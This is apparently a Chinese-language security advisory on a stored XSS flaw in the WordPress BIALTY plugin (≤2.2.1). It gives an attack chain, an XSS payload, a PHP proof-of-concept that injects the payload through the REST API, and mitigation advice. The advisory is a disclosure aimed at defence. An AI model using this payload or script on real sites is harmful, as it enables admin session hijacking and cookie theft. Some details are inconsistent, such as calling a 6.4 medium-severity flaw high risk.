CVE-2025-15019 WordPress BIALTY插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-15019

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

BIALTY - Bulk Image Alt Text with Yoast SEO + WooCommerce plugin for WordPress

漏洞概述

CVE-2025-15019是WordPress插件BIALTY - Bulk Image Alt Text中的一个高危安全漏洞。该插件用于批量管理图片Alt标签，与Yoast SEO和WooCommerce集成使用。漏洞存在于所有版本直至2.2.1，由于插件在处理'bialty_cs_alt'文章元数据时缺乏足够的输入清理和输出转义，导致存储型跨站脚本(XSS)漏洞。攻击者利用此漏洞需要具有Contributor级别或更高的WordPress用户权限，这意味着几乎所有注册用户都可能成为潜在攻击者。攻击成功后，恶意JavaScript代码会被永久存储在数据库中，每当管理员访问受感染文章的编辑器时，恶意脚本就会自动执行，可能导致管理员账户被劫持、恶意内容注入或敏感信息泄露等严重后果。由于该漏洞影响范围广且利用门槛较低，建议所有使用该插件的用户立即采取修复措施。

技术细节

该漏洞的根本原因在于BIALTY插件的admin/views/metabox.view.php文件中对用户输入的'bialty_cs_alt'文章元数据处理不当。具体表现为：1) 输入验证不足：插件未对用户提交的Alt文本进行严格的输入清理，允许攻击者嵌入恶意JavaScript代码；2) 输出转义缺失：当该元数据在文章编辑器页面输出时，插件未进行适当的HTML转义处理，导致嵌入的脚本被浏览器解析执行。攻击者只需在编辑文章时，通过插件提供的Alt文本输入框提交包含恶意脚本的内容，如：<img src=x onerror=alert(document.cookie)>，该脚本会被保存到wp_postmeta表中。当管理员打开该文章进行编辑时，插件会从数据库读取并显示该Alt文本，由于缺乏转义处理，恶意脚本立即执行。此攻击属于存储型XSS，相比反射型XSS危害更大，因为恶意代码会持久存在于数据库中，影响所有访问该内容的用户。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的WordPress版本及BIALTY插件版本，确认版本 <= 2.2.1

STEP 2

Authentication

攻击者获取WordPress Contributor级别或更高权限的账户（可通过注册或社会工程学手段获取）

STEP 3

Payload Injection

攻击者编辑文章，在BIALTY插件的Alt文本输入框中注入恶意JavaScript代码，如：<img src=x onerror=alert(document.cookie)>

STEP 4

Persistence

恶意脚本随'bialty_cs_alt'元数据一起存储到wp_postmeta表中，实现持久化

STEP 5

Trigger

管理员访问受感染文章的编辑器页面，插件从数据库读取元数据并输出到页面

STEP 6

Execution

由于缺乏输出转义，恶意JavaScript代码在管理员浏览器中执行，可窃取Cookies、劫持会话或进一步提权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-15019 PoC - BIALTY Plugin Stored XSS
 * WordPress Contributor+ privilege required
 * 
 * This PoC demonstrates the stored XSS via bialty_cs_alt post meta.
 * When admin accesses the post editor, the XSS payload executes.
 */

// Method 1: Direct WordPress REST API exploitation
$target_url = 'http://target-wordpress-site/wp-json/wp/v2/posts/YOUR_POST_ID';
$xss_payload = '<img src=x onerror=alert(document.cookie)>';

$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Authorization: Bearer YOUR_AUTH_TOKEN'
));
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(array(
    'meta' => array(
        'bialty_cs_alt' => $xss_payload
    )
)));

$response = curl_exec($ch);
curl_close($ch);

echo "Payload sent. XSS will trigger when admin opens post editor.\n";

// Method 2: SQL injection to insert meta directly (if applicable)
// INSERT INTO wp_postmeta (post_id, meta_key, meta_value) 
// VALUES (POST_ID, 'bialty_cs_alt', '<img src=x onerror=alert(1)>');
?>

影响范围

BIALTY - Bulk Image Alt Text plugin <= 2.2.1 (所有版本)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 暂时禁用或删除BIALTY插件，使用WordPress内置的图片Alt文本功能替代；2) 如果必须使用该插件，限制新用户注册功能，防止攻击者获取 Contributor 权限；3) 提醒管理员在访问文章编辑器时使用隐私/无痕模式浏览器；4) 部署Web应用防火墙(WAF)规则过滤包含<script>、<img onerror>、<svg onload>等XSS特征的请求；5) 实施严格的CSP策略阻止内联脚本执行；6) 定期检查wp_postmeta表中是否存在异常的'bialty_cs_alt'记录。